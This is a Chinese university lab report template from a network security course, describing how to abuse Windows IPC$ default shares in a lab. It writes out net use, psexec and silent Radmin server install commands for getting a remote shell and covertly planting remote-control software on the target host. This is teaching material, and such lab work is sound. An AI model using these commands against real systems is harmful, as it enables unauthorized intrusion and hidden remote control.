沈 阳 工 程 学 院
学 生 实 验 报 告
实验室名称:信息学院网络安全实验室实验课程名称:网络安全技术
实验项目名称:实验五 IPC$管道的利用与远程控制班 级:
姓 名: 学 号:
实验台编号:17成绩:
实验日期: 2014 年 4 月 16 日 指导教师:
批阅教师(签字):
一.实验目的空会话通常为黑客成功入侵提供跳板,如提供远程主机时间、用户列表等,大大增加了黑客入侵的成功机会;通过实验来限制IPC$连接,增加主机的安全性。二.实验内容映射默认共享;上传恶意程序;远程控制;删除默认共享。三.实验原理IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。net use \\\\远程主机IP “密码” /user: “用户名” 与远程主机建立IPC$连接通道net use z: \\\\远程主机ip\\c$copy e:\\a.txt \\\\远程主机ip\\c$ net use \\\\远程主机ip /del 将远程主机的C盘影射为本地Z盘 拷贝本地文件e:\\\\a.txt到远程主机 删除与远程主机的IPC$连接四.实验软硬件环境本地主机(WindowsXP)、Windows实验台网络环境拓扑如下图所示。本地主机Windows实验台如图 网络环境拓扑图实验目标需首先确定所在实验台IP地址,并根据实验步骤填写正确的IP地址进行实验。五.实验步骤一、打开被攻击机即目标主机的IPC$默认共享启动实验台,以实验台为被攻击机即目标主机。主机IP如图1所示。图1 目的主机IP地址
利用IPC$漏洞实施攻击,首先要保证被攻击机的IPC$默认共享已经打开。在
Win2003操作系统中admin$,IPC$,C$默认打开,而在WinXP中根据不同版本有所不同。可用net share命令查看,如图2所示。
图2 查看共享文件
如果没有打开,可以在主机上运行命令开启,如图3所示。
图3 添加删除共享
二、利用以下命令与远程主机建立IPC连接
net use \\\\远程主机ip “密码” /user: “用户名” 与目标主机建立IPC$连接通道net use z: \\\\远程主机IP\\c$ 将目标主机的C盘影射为本地Z盘copy e:\\a.txt \\\\远程主机ip\\c$ 拷贝本地文件e:\\a.txt到目标主机
net use \\\\远程主机ip /del 具体如图4、图5所示。
删除与目标主机的IPC$连接
图4
图5
将对方的C盘映射为本地的Z盘,则可以像操纵本地硬盘一样对目标主机C盘进行操作。如图6所示。
图6 映射共享文件夹
三、攻击实施
现在的目标就是在对方不知道的情况下安装并运行软件。(1)实验工具箱中取得实验工具radmin,将其中的
r_server.exe、raddrv.dll、AdmDll.dll拷贝粘贴到映射的z盘,即远程主机的C盘。
(2)利用psexec工具获得对方的Shell,命令如下:
psexec \\\\远程主机ip –u 用户名 –p 密码 cmd.exe;
这里的-u和-p参数分别指定远程主机的用户名和密码,cmd.exe是远程主机的
命令行程序。执行成功之后就获取到了目标主机的Shell,通过下图可以看到ipconfig命令已经在远程主机上执行了,获得的是对方主机的IP地址172.20.3.17。如图7所示。
图7 查看远程IP配置
(3)在得到的远程主机Shell上安装r_server,命令如下:C:\\r_server /install /pass:密码 /port:端口 /silence。
其中密码可指定为123,此实验中没有用到。通过/port参数指定端口号,默认是4899。/silence参数表示静默安装,否则会在目标主机上出现安装的窗口,这是攻击者不希望看到的,如图8所示。
图8 安装r_server
(4)启动r_server服务
net start r_server (注:如提示服务名称无效,则需运行两次或多次),如图9所示。
[VIP专享]网络安全技术实验八_ip管道利用



